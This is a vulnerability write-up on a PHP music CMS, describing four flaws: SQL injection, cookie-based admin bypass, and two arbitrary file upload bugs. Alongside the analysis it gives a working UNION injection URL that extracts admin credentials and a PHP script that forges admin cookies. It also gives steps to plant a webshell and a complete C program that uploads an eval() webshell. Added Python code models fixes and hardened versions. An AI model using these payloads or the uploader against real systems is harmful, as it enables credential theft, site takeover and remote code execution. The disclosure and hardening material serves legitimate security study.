Multiple vulnerabilities were found while reading the source of V2.0BETA (20130709).
1. /home/libs/common.php Injection Vulnerability
The /home directory contains index.php. That file has no functionality of its own; it only includes /home/libs/common.php. The problematic code is:
<?php
include_once(CSDJ_PATH.'/conn.php');
ob_start();
// permitted actions
$dos = array('drop', 'index', 'dance', 'gd', 'gx', 'pick', 'reco', 'feed', 'pic', 'gbook', 'skin', 'blog');
// get the variables
$usym = $_SERVER['HTTP_HOST'];
$uall = explode(".", $usym);
$op = CS_Request("op");
$uid = CS_Request("uid");   // problem parameter
$id = CS_Request("id");
$pages = CS_Request("pages");
if (empty($uid)) $uid = $uall[0];
$op = (!empty($op) && in_array($op, $dos)) ? $op : 'index';
if (empty($uid)) exit('Sorry, the member UID is empty; the parameter is incorrect!');
if ($op == 'skin') {
    if (isset($_COOKIE["cd_name"])) {
        $uid = $_COOKIE["cd_id"];
    } else {
        exit("<script>window.location='http://".cd_weburl."/I/login.php'</script>");
    }
}
global $db;
$row = $db->getrow("Select * from ".tname('user')." where cd_id = ".$uid."");   // $uid enters the query unquoted
?>
In this code $uid goes through CS_Request. If CS_Request does not filter it adequately, $uid ends up inside the SQL statement at the bottom. The CS_Request implementation:
function CS_Request($pi_strName, $pi_Def = "", $pi_iType = CS_TXT)
{
    if (isset($_GET[$pi_strName]))
        $t_Val = trim($_GET[$pi_strName]);
    else if (isset($_POST[$pi_strName]))
        $t_Val = trim($_POST[$pi_strName]);
    else
        return $pi_Def;

    // numeric parameters: anything that is not numeric falls back to the default
    if (CS_INT == $pi_iType) {
        if (is_numeric($t_Val))
            return $t_Val;
        else
            return $pi_Def;
    }

    // string parameters: &, <, > and the quote characters are replaced by HTML entities
    // (the entity strings were lost in the page's listing; the standard ones are assumed here)
    $t_Val = str_replace("&", "&amp;", $t_Val);
    $t_Val = str_replace("<", "&lt;", $t_Val);
    $t_Val = str_replace(">", "&gt;", $t_Val);
    if (get_magic_quotes_gpc()) {
        // with magic_quotes_gpc on the quotes arrive backslash-escaped
        $t_Val = str_replace("\\\"", "&quot;", $t_Val);
        $t_Val = str_replace("\\'", "&#39;", $t_Val);
    } else {
        $t_Val = str_replace("\"", "&quot;", $t_Val);
        $t_Val = str_replace("'", "&#39;", $t_Val);
    }
    return $t_Val;
}
CS_Request handles two kinds of parameter: for the numeric type (CS_INT) it only lets is_numeric() values through, and for the string type it replaces &, <, >, " and ' with entities.
$uid is a numeric parameter and should have gone through the numeric filter, but the call in the code is wrong. The correct call is
$uid = CS_Request("uid", 0, CS_INT);
whereas the author calls $uid = CS_Request("uid"), which applies only the string filtering to $uid.
Since single and double quotes are replaced in string mode, this would still be safe if $uid were placed inside quotes, but the query is:
$row = $db->getrow("Select * from ".tname('user')." where cd_id = ".$uid."");
$uid is not enclosed in quotes, so no quote character is needed to break out of the statement. The statement would at least need to be
$row = $db->getrow("Select * from ".tname('user')." where cd_id = '".$uid."'");
and the robust fix is the CS_INT call above (or intval($uid) before concatenation), so that only a number can ever reach the query.
SQL injection request (0x3c is the MySQL hex literal for "<", used because a literal "<" would be entity-encoded by the string filter; the number of UNION columns must match the user table, and the column list and LIMIT clause below are as recorded on the page):
http://www.0day5.com/home/index.php?uid=1 and 1=2 union select 1,2,3,concat(CD_AdminUserName,0x3c,0x3c,CD_AdminPassWord),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,22,24,44,45,46 from musicdj_admin limit
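The following is an added Python model of the two CS_Request modes and of the query above; it is not the application's code. It shows that a payload built without &, <, >, " or ' passes the string filter unchanged (hence the 0x3c separator), that the same payload is discarded by the CS_INT filter, and what a parameterized version of the query looks like. The entity strings, the table name cs_user and the shortened column list are assumptions.

```python
import re

# PHP's is_numeric(): optional sign, digits with optional fraction, optional exponent.
_PHP_NUMERIC = re.compile(r"[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def cs_request_txt(value, magic_quotes=False):
    """Model of CS_Request() in CS_TXT mode: trim, then entity-encode &, <, > and quotes."""
    value = value.strip()
    value = value.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
    if magic_quotes:  # with magic_quotes_gpc on the quotes arrive backslash-escaped
        value = value.replace('\\"', "&quot;").replace("\\'", "&#39;")
    else:
        value = value.replace('"', "&quot;").replace("'", "&#39;")
    return value


def cs_request_int(value, default="0"):
    """Model of CS_Request() in CS_INT mode: non-numeric input falls back to the default."""
    value = value.strip()
    return value if _PHP_NUMERIC.fullmatch(value) else default


def user_query_vulnerable(uid):
    """The query as written in common.php: the filtered string is concatenated unquoted."""
    return "Select * from cs_user where cd_id = " + cs_request_txt(uid)


def user_query_fixed(uid):
    """Hardened form: numeric filter, strict integer check, and a placeholder for the driver."""
    uid = cs_request_int(uid)
    if not re.fullmatch(r"\d+", uid):  # stricter than is_numeric(): no sign, fraction or exponent
        raise ValueError("uid must be a non-negative integer")
    return "SELECT * FROM cs_user WHERE cd_id = %s", (int(uid),)


# Constructed payload modelled on the page's request: it contains none of the
# characters the string filter touches, and 0x3c stands in for '<'.
PAYLOAD = ("1 and 1=2 union select 1,2,3,"
           "concat(CD_AdminUserName,0x3c,0x3c,CD_AdminPassWord),5 "
           "from musicdj_admin limit 1")


def is_tampered(sql):
    """Crude check usable over a query log: the cd_id predicate is no longer a single number."""
    m = re.search(r"where cd_id = (.*)$", sql, re.IGNORECASE)
    return m is None or not _PHP_NUMERIC.fullmatch(m.group(1))


if __name__ == "__main__":
    print(user_query_vulnerable(PAYLOAD))  # the UNION survives intact
    print(user_query_fixed(PAYLOAD))       # the payload collapses to the default uid 0
```

Note that the CS_INT path maps any non-numeric input to the default rather than rejecting the request; that is the behaviour of the original function, and the strict \d+ check in user_query_fixed is the extra line a practitioner would add.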
2. /admin/admin_check.php Permission Bypass Vulnerability
The injection above only yields the administrator's MD5 password hash, which still has to be cracked; with this vulnerability an administrator can be added directly. Every page under /admin starts by calling admincheck(N), where N is the permission number of that page, and checks permissions by that number. admincheck is implemented in /admin/admin_check.php:
function admincheck($CD_Permission)
{
    if ($_COOKIE['CD_Permission'] <> '') {
        $menuarr = explode(',', $_COOKIE['CD_Permission']);
        $adminlogined = 'false';
        for ($i = 0; $i < count($menuarr); $i++) {
            if ($menuarr[$i] == $CD_Permission) {
                $adminlogined = 'true';
            }
        }
        if ($adminlogined == 'false') {
            AdminAlert('Error. You are not authorized to access this page!', '', 2);
        }
    } else {
        AdminAlert('Error. You are not authorized to access this page!', '', 2);
    }
}

if (empty($_COOKIE['CD_AdminID'])) {
    AdminAlert('You do not have permission to access this page; this operation has been recorded!', 'admin_login.php', 0);
} elseif ($_COOKIE['CD_Login'] != md5($_COOKIE['CD_AdminID'].$_COOKIE['CD_AdminUserName'].$_COOKIE['CD_AdminPassWord'].$_COOKIE['CD_Permission'])) {
    AdminAlert('You do not have permission to access this page; this operation has been recorded!', 'admin_login.php', 0);
}
Two checks are performed: 1. $_COOKIE['CD_Permission'], a comma-separated list, must contain the permission number passed in. 2. $_COOKIE['CD_Login'] must equal md5($_COOKIE['CD_AdminID'].$_COOKIE['CD_AdminUserName'].$_COOKIE['CD_AdminPassWord'].$_COOKIE['CD_Permission']).
Both conditions are evaluated using nothing but cookie values: there is no server-side secret in the hash and none of the values is compared against the database, so anyone can satisfy both. Once in the backend you can add administrators and upload files. Firefox's Tamper Data can be used to send the forged cookies. Cookie generation code:
<?php
$CD_Permission = "1,2,3,4,5,6,7,8,9,10,11";
$CD_AdminID = 1;
$CD_AdminUserName = "ywledoc";
$CD_AdminPassWord = 123;
$CD_Login = md5($CD_AdminID.$CD_AdminUserName.$CD_AdminPassWord.$CD_Permission);
echo "CD_Permission=1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11;CD_AdminID=1;CD_AdminUserName=ywledoc;CD_AdminPassWord=123;CD_Login=".$CD_Login."<br>";
?>
This prints: CD_Permission=1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11; CD_AdminID=1; CD_AdminUserName=ywledoc; CD_AdminPassWord=123; CD_Login=<the 32-character md5 the script prints>
As far as the code shown is concerned, the user name and password do not need to belong to a real account. Replace the browser's cookies with these values and open /admin/admin_admin.php.
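The following is an added Python model of the two admin_check.php checks, of the forgery above, and of a hardened replacement; it is not the application's code. The legacy check accepts any cookie set whose MD5 the client computes itself; the hardened check signs (admin id, permission list) with a key the client never sees and reads the permissions back from the signed value. The cookie names are the page's; SERVER_SECRET and the CD_Session cookie are assumptions.

```python
import hashlib
import hmac
import secrets


def admin_check_legacy(cookies, required_permission):
    """Model of admin_check.php: every input to both checks comes from the client."""
    if not cookies.get("CD_AdminID"):
        return False
    material = (cookies.get("CD_AdminID", "") + cookies.get("CD_AdminUserName", "")
                + cookies.get("CD_AdminPassWord", "") + cookies.get("CD_Permission", ""))
    if cookies.get("CD_Login") != hashlib.md5(material.encode()).hexdigest():
        return False
    return required_permission in cookies.get("CD_Permission", "").split(",")


def forge_cookies(admin_id="1", username="ywledoc", password="123",
                  permissions="1,2,3,4,5,6,7,8,9,10,11"):
    """Same computation as the page's PHP snippet: the 'signature' contains no secret."""
    login = hashlib.md5((admin_id + username + password + permissions).encode()).hexdigest()
    return {"CD_AdminID": admin_id, "CD_AdminUserName": username,
            "CD_AdminPassWord": password, "CD_Permission": permissions, "CD_Login": login}


# Hardened variant (assumption: the key is generated once and stored server-side only).
SERVER_SECRET = secrets.token_bytes(32)


def issue_session(admin_id, permissions, secret=SERVER_SECRET):
    """Issued after a real login: HMAC over the admin id and the permission list."""
    payload = f"{admin_id}|{permissions}"
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return {"CD_Session": f"{payload}|{tag}"}


def admin_check_hmac(cookies, required_permission, secret=SERVER_SECRET):
    """Recompute the tag with the server key; permissions are taken from the signed payload only."""
    parts = cookies.get("CD_Session", "").split("|")
    if len(parts) != 3:
        return False
    admin_id, permissions, tag = parts
    expected = hmac.new(secret, f"{admin_id}|{permissions}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return False
    return required_permission in permissions.split(",")


if __name__ == "__main__":
    print(admin_check_legacy(forge_cookies(), "7"))                # True: forged cookies pass
    print(admin_check_hmac(issue_session("1", "1,2,3"), "7"))      # False: not in the signed list
```

The password never needs to appear in a cookie at all; the legacy scheme sends it on every request and gains nothing from it, because the hash that "protects" it is computable by whoever sends it.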
3. /admin/admin_mold.php Arbitrary File Upload Vulnerability (requires magic_quotes_gpc off)
Using the vulnerability above, add an administrator; the steps below start after logging in. First the vulnerable code:
function Save()
{
    $CD_Name = $_POST['filename'];
    $CD_Path = $_POST['folder'];
    $CD_TempName = $_POST['tempname'];
    $CD_Content = stripslashes($_POST['content']);
    $F_Ext = substr(strrchr($CD_Name, '.'), 1);
    $FileType = strtolower($F_Ext);
    if ($FileType == 'htm' or $FileType == 'html' or $FileType == 'shtml' or $FileType == 'js' or $FileType == 'css' or $FileType == 'txt') {
        if (!$fp = fopen($CD_Path.$CD_Name, 'w')) {
            AdminAlert('Error: no write permission for file '.$CD_Path.$CD_Name.'!', '?action=templist&tempname='.$CD_TempName.'&dir='.$CD_Path.'', 1);
        }
        $ifile = new iFile($CD_Path.$CD_Name, 'w');
        $ifile->WriteFile($CD_Content, 3);
        AdminAlert('Congratulations! Template file edited!', '?action=templist&tempname='.$CD_TempName.'&dir='.$CD_Path.'', 0);
    } else {
        AdminAlert('An error occurred. The operation has been blocked!', '?action=templist&tempname='.$CD_TempName.'&dir='.$CD_Path.'', 1);
    }
}
The check in this line:
if ($FileType == 'htm' or $FileType == 'html' or $FileType == 'shtml' or $FileType == 'js' or $FileType == 'css' or $FileType == 'txt')
validates only the suffix of $CD_Name, but the file is written to $CD_Path.$CD_Name and $CD_Path is not validated at all. You can therefore put %00 in $CD_Path to truncate the path (PHP before 5.3.4 truncates file names at the NUL byte), so that the .txt suffix the check sees never reaches the file system. When magic_quotes_gpc is on, however, the NUL is escaped to \0 and the truncation fails; since most sites have gpc on, this vulnerability is less convenient. Note that even without truncation the unvalidated $CD_Path still lets an administrator write template-typed files into any directory the web server can write to. Access
/admin/admin_mold.php?action=templist&tempname=%C4%AC%C8%CF%C4%A3%B0%E6&dir=../skin/index/9ku/ , pick a template to edit and put your webshell into its content.
Click submit, intercept the request with Tamper Data and modify the folder and filename fields; the shell file is created directly, much as in the ShopEx case.
4. /admin/inc/uploads.php Arbitrary File Upload Vulnerability (requires register_globals on)
The administrator upload flow is /admin/inc/upload.php -> /admin/inc/upload/uploadify.swf -> /admin/inc/uploads.php; the file is actually written in the last step. The implementation of /admin/inc/uploads.php:
include "../../include/conn.php";
$id = SafeRequest("id", "get");
$action = SafeRequest("ac", "get");
switch ($action) {
    case 'music':
        $targetFiles = "../../upload/musicurl/".$id.".".fileext($_FILES['Filedata']['name']);
        $fileexts = "*.mp3;*.wma";
        $filetypes = "song files";
        break;
    case 'musicpic':
        $targetFiles = "../../upload/musicpic/".$id.".".fileext($_FILES['Filedata']['name']);
        $fileexts = "*.jpg;*.gif";
        $filetypes = "song pictures";
        break;
    case 'special':
        $targetFiles = "../../upload/special/".$id.".".fileext($_FILES['Filedata']['name']);
        $fileexts = "*.jpg;*.gif";
        $filetypes = "album image";
        break;
    // no default: an unknown action leaves $targetFiles and $fileexts undefined
}
if (!empty($_FILES)) {
    $tempFile = $_FILES['Filedata']['tmp_name'];
    $targetFile = $targetFiles;
    // $targetPath = $_SERVER['DOCUMENT_ROOT'].$_REQUEST['folder'].'/';
    // $targetFile = str_replace('//', '/', $targetPath).$_FILES['Filedata']['name'];
    $fileTypes = str_replace('*.', '', $fileexts);
    $fileTypes = str_replace(';', '|', $fileTypes);
    $typesArray = split('\|', $fileTypes);
    $fileParts = pathinfo($_FILES['Filedata']['name']);
    if (in_array($fileParts['extension'], $typesArray)) {
        // Uncomment the following line if you want to make the directory if it doesn't exist
        // mkdir(str_replace('//', '/', $targetPath), 0755, true);
        // setcookie("targetFile", $targetFile, time() + 86400, "/");
        move_uploaded_file($tempFile, $targetFile);
    }   // (closing braces not in the page's listing)
}
$fileexts determines the allowed upload types and $targetFiles the destination path, and both are assigned only inside the switch on $action. If an $action value that matches no case is supplied, $targetFiles and $fileexts remain undefined. When register_globals is on, they can then be assigned through $_POST. With register_globals off, the application would need code like the following for the same effect:
foreach (array('_COOKIE', '_POST', '_GET') as $_request) {
    foreach ($$_request as $_key => $_value) {
        $_key{0} != '_' && $$_key = daddslashes($_value);
    }
}
That is the classic global-variable overwrite pattern, but this application does not contain such code, so you can only rely on register_globals being on. As register_globals is usually off, this vulnerability is also awkward to use. The author wrote a C program that submits the POST request:
// Windows-only WinSock client; the original is built with MSVC as C++ (unqualified
// sockaddr_in / hostent). Usage: uploads_poc <host> <application directory>
#include <stdio.h>
#include <string.h>
#include <WinSock2.h>
#include <Windows.h>
#pragma comment(lib, "ws2_32")

// multipart boundary; every part separator is "--" followed by BOUNDARY
#define BOUNDARY "---------------------------1681160893454"

int main(int argc, char *argv[])
{
    PVOID pBuff = NULL;
    SOCKET hSock = INVALID_SOCKET;
    int iResult = 0;
    WSADATA wsaData = {0};
    sockaddr_in clientServer = {0};
    hostent *pclientAddr = NULL;
    char body[1024] = {0};

    iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult != 0) return 0;

    do {
        if (argc != 3) break;

        // targetFiles and fileexts become PHP globals only when register_globals is on
        // and "ac" matches no case of the switch, leaving both variables undefined
        sprintf(body,
            "--" BOUNDARY "\r\n"
            "Content-Disposition: form-data; name=\"targetFiles\"\r\n"
            "\r\n"
            "../../upload/special/ywledoc.php\r\n"
            "--" BOUNDARY "\r\n"
            "Content-Disposition: form-data; name=\"fileexts\"\r\n"
            "\r\n"
            "*.php\r\n"
            "--" BOUNDARY "\r\n"
            "Content-Disposition: form-data; name=\"Filedata\"; filename=\"yijuma.php\"\r\n"
            "Content-Type: application/octet-stream\r\n"
            "\r\n"
            "<?php eval($_POST[paxmac])?>\r\n"
            "--" BOUNDARY "\r\n"
            "Content-Disposition: form-data; name=\"submit\"\r\n"
            "\r\n"
            "Submit\r\n"
            "--" BOUNDARY "--\r\n");

        // 0x1000 bytes: the original's 0x200 was smaller than the request it built
        pBuff = VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_READWRITE);
        if (pBuff == NULL) break;
        // Content-Length is computed from the body instead of being hard-coded
        sprintf((PCHAR)pBuff,
            "POST /%s/admin/inc/uploads.php HTTP/1.1\r\n"
            "Host: %s\r\n"
            "User-Agent: Mozilla/5.0\r\n"
            "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
            "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
            "Accept-Encoding: gzip, deflate\r\n"
            "Connection: keep-alive\r\n"
            "Content-Type: multipart/form-data; boundary=" BOUNDARY "\r\n"
            "Content-Length: %u\r\n"
            "\r\n"
            "%s",
            argv[2], argv[1], (unsigned)strlen(body), body);

        hSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (hSock == INVALID_SOCKET) break;
        clientServer.sin_family = AF_INET;
        clientServer.sin_port = htons(80);
        pclientAddr = gethostbyname(argv[1]);
        if (pclientAddr == NULL) {
            printf("URL parsing error. Check the input!\n");
            break;
        }
        clientServer.sin_addr.s_addr = *(ULONG *)(pclientAddr->h_addr_list[0]);
        if (connect(hSock, (sockaddr *)&clientServer, sizeof(sockaddr_in)) != 0) {
            printf("The connection to the server was refused!\n");
            break;
        }
        send(hSock, (PCHAR)pBuff, (int)strlen((PCHAR)pBuff), 0);
        printf("Done. Check the URL: http://%s/%s/upload/special/ywledoc.php\n", argv[1], argv[2]);
    } while (FALSE);

    if (hSock != INVALID_SOCKET) closesocket(hSock);
    if (pBuff != NULL) VirtualFree(pBuff, 0, MEM_RELEASE);
    WSACleanup();
    return 0;
}
After running it, a ywledoc.php webshell exists in /upload/special/ with the password paxmac.
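Both file-write bugs above come from the same two mistakes: the extension is checked on a name the client supplies while the file is written somewhere else, and the destination (or, in uploads.php, the variables that should hold it) can be influenced by the request. The following added Python example, which is not the application's code, shows one hardened resolution of the target path for both admin_mold.php's Save() and admin/inc/uploads.php: the only request-controlled inputs are an action name, a numeric id, a folder relative to the template root and a file name; destination directories and extension whitelists come from a fixed table; NUL bytes are rejected before the path is touched; and the whitelist is applied to the final resolved path, which must stay under its root. The directory layout, UploadRejected and the rejects() helper are assumptions.

```python
import os
import posixpath


class UploadRejected(ValueError):
    pass


# The only source of destination directories and extension whitelists.
# A request may name a slot; it never supplies a path or a whitelist.
UPLOAD_SLOTS = {
    "music":    ("upload/musicurl", {"mp3", "wma"}),
    "musicpic": ("upload/musicpic", {"jpg", "gif"}),
    "special":  ("upload/special",  {"jpg", "gif"}),
}
TEMPLATE_EXTS = {"htm", "html", "shtml", "js", "css", "txt"}


def final_extension(path):
    """Lower-cased extension of the last path component; a NUL byte anywhere is fatal."""
    if "\x00" in path:
        raise UploadRejected("NUL byte in path")
    base = posixpath.basename(path.replace("\\", "/"))
    if "." not in base or base.endswith("."):
        raise UploadRejected("no file extension")
    return base.rsplit(".", 1)[1].lower()


def resolve_upload_target(webroot, action, file_id, client_filename):
    """uploads.php replacement: an unknown action is an error, not 'leave the variables undefined'."""
    if action not in UPLOAD_SLOTS:
        raise UploadRejected(f"unknown action {action!r}")
    subdir, allowed = UPLOAD_SLOTS[action]
    if not file_id.isdigit():
        raise UploadRejected("id must be numeric")
    ext = final_extension(client_filename)
    if ext not in allowed:
        raise UploadRejected(f".{ext} is not allowed for {action}")
    return os.path.join(os.path.realpath(webroot), subdir, f"{file_id}.{ext}")


def resolve_template_target(template_root, folder, filename):
    """Save() replacement: whitelist checked on the resolved path, which must stay under the root."""
    if "\x00" in folder or "\x00" in filename:
        raise UploadRejected("NUL byte in path")
    root = os.path.realpath(template_root)
    candidate = os.path.realpath(os.path.join(root, folder, filename))
    if os.path.commonpath([root, candidate]) != root:  # catches ../ and absolute folders
        raise UploadRejected("path escapes the template root")
    if final_extension(candidate) not in TEMPLATE_EXTS:
        raise UploadRejected("not a template file type")
    return candidate


def rejects(fn, *args):
    """True when fn(*args) raises UploadRejected; used to exercise the checks."""
    try:
        fn(*args)
    except UploadRejected:
        return True
    return False


if __name__ == "__main__":
    print(resolve_upload_target("/srv/musicdj", "special", "12", "cover.jpg"))
    print(rejects(resolve_template_target, "/srv/musicdj/skin", "../skin/index/shell.php\x00", "x.txt"))
```

The write itself should then use the returned path only; the original Save() still opens $CD_Path.$CD_Name with fopen() and again through iFile, and neither call sees anything the extension check saw.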